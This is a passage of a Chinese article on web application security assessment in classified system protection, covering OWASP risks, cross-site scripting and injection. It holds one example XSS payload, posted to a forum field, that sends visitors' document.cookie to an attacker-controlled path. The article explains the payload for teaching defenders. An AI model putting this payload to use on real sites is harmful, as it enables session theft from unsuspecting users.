- 1、本文档共8页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
系統等级保护中的Web应用安全评估-精
系统等级保护中的Web应用安全评估摘要:Web应用安全评估是系统等级保护评估中的重要一环,本文以实例分析了常见Web应用漏洞的形成原理,介绍了相应的评估实施方法,并给出了增强Web应用安全性的实用性建议。关键词:Web应用安全评估系统等级保护跨站脚本 SQL注入【本文作者:李毅、顾健、顾铁军,转载请注明】1.引言当今世界,因特网已经成为一个非常重要的基础平台,很多单位都将应用架设在该平台上,为客户提供更为方便、快捷的服务支持。这些应用在功能和性能上,都在不断的完善和提高,然而在非常重要的安全性上,却没有得到足够的重视。由于网络技术日趋成熟,黑客们也将注意力从以往对网络服务器的攻击逐步转移到了对Web应用的攻击上。根据 Gartner 的最新调查,信息安全攻击有 75% 都是发生在 Web应用而非网络层面上。同时,数据也显示,三分之二的Web站点都相当脆弱。然而现实中绝大多数的投资都花费在网络和服务器的安全上,没有从真正意义上保证Web应用本身的安全,给黑客以可乘之机。在Web应用的各个层面,都会使用不同的技术来确保安全性。为了保护服务端机器的安全,用户会安装防病毒软件;为了保证用户数据传输到Web服务器的传输安全,通信层通常会使用SSL(安全套接层)技术加密数据;使用防火墙和IDS(入侵诊断系统)/IPS(入侵防御系统)来保证只允许特定的访问,其他不必要暴露的端口和非法的访问,在这里都会被阻止。但是,即便有防病毒保护、防火墙和 IDS/IPS,仍然不得不允许一部分的通讯经过防火墙,毕竟Web应用的目的是为用户提供服务,保护措施可以关闭不必要暴露的端口,但是 Web应用必须的 80 和 443 端口,是一定要开放的。可以顺利通过的这部分通讯,可能是善意的,也可能是恶意的,很难辨别。这里需要注意的是,Web 应用是由软件构成的,那么,它一定会包含缺陷(bugs),这些缺陷就可以被恶意的用户利用,他们通过执行各种恶意的操作,偷窃、操控或破坏 Web应用中的重要信息。通常用户会采用网络脆弱性扫描工具来检查Web服务器的漏洞,但是常规的网络脆弱性扫描工具仅仅用来分析网络层面的漏洞,而不是Web应用本身,所以不能彻底提高Web应用安全性。只要访问可以顺利通过企业的防火墙,Web应用就毫无保留的呈现在用户面前。只有加强Web应用自身的安全,才是真正的Web应用安全解决之道。Web应用已经成为现今各类信息系统中不可或缺的组成部分,因此在系统等级保护评估中对Web应用安全的评估成为整个安全评估工作中重要一环,而且由于Web应用漏洞存在的普遍性以及对Web应用漏洞利用的直观性,这方面的评估对被评估方具有很强的现实意义,对引导被评估方重新审视自己系统的安全性也更有说服力。本文从常见的Web应用漏洞原理入手,介绍了常用的Web应用安全评估方法,并给出了在评估后对被评估方的实用建议。2.常见的Web应用漏洞OWASP(Open Web Application Security Project)是一个专注于研究Web应用安全的国际性组织。在其的一份报告中列举出了常见的十大 Web 应用安全隐患,见图1:图1 OWASP Web应用安全隐患排名从图中可以看出有两个概率最高的攻击手段,它们分别是“跨站点脚本攻击”(Cross-Site Scripting)和“注入缺陷”(Injection Flaws)。下面将通过举例来说明这两种攻击是如何实施的。2.1.跨站脚本攻击跨站脚本攻击指的是攻击者往Web页面里插入恶意html代码,当用户浏览该页面时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的,其攻击对象主要是Web应用的访问者而非Web应用系统本身。跨站脚本攻击属于被动式的攻击,因为需要访问特定Web页面才能进行攻击,因为其被动且不好利用,所以许多人常忽略其危害性。跨站脚本攻击得以实现的前提是可以在Web页面中插入特定的html代码,这一般是通过利用Web应用对提交数据的检查漏洞来完成。以BBS为例,如果Web应用没有对用户的输入进行检查,恶意攻击者可以在BBS的输入框中提交如下内容:你好script language=’javascript’document.write(img src=/getCookies+?c=+document.cookie+);script/当访问者访问到该攻击者的发言时,看到的是“你好”两个字,但是他不知道,他的cookie信息已经被发送到了。而cookie信息中往往包含了用户的注册信息等及其敏感的数据,如果是银行注册信息等,后果将不堪设想。除了获取cookie信息,跨站脚本攻击还可造成的危害有:屏蔽页面特定信息、伪造页面信息、拒绝服务攻击、突破外网内网不同安全设置、与其它漏洞结合修改系统设置、执行系统命令
您可能关注的文档
- 系統得详细设计书.doc
- 系統思想与创新能力讲义中青一106..doc
- 系統思考的四大关键问题.doc
- 系統性红斑狼疮130例临床分析.doc
- 系統性能测试与检测标准.doc
- 系統总线和具有基本输入输出功能的总线接口实验.doc
- 系統总体设计样本.docx
- 系統恢复(中英文对照).doc
- 系統技术介绍小谢.doc
- 系統技术架构.doc
- 小学科学:ESP8266智能插座电路原理与动手实践研究教学研究课题报告.docx
- 《金融开放浪潮下我国多层次监管体系构建与创新研究》教学研究课题报告.docx
- 区域教育质量监测中人工智能应用的数据质量分析与优化策略教学研究课题报告.docx
- 《金融科技监管中的数据治理与合规性要求》教学研究课题报告.docx
- 《3D打印技术在航空航天领域中的多材料制造与复合材料应用》教学研究课题报告.docx
- 《绿色金融发展中的政府职能与市场机制研究》教学研究课题报告.docx
- 《植物工厂多层立体栽培光环境调控技术对植物生长发育节律的调控机制探讨》教学研究课题报告.docx
- 销售团队年度业绩总结.docx
- 银行风险管理与金融危机防范.docx
- 银行网络攻击预警与快速响应机制.docx
文档评论(0)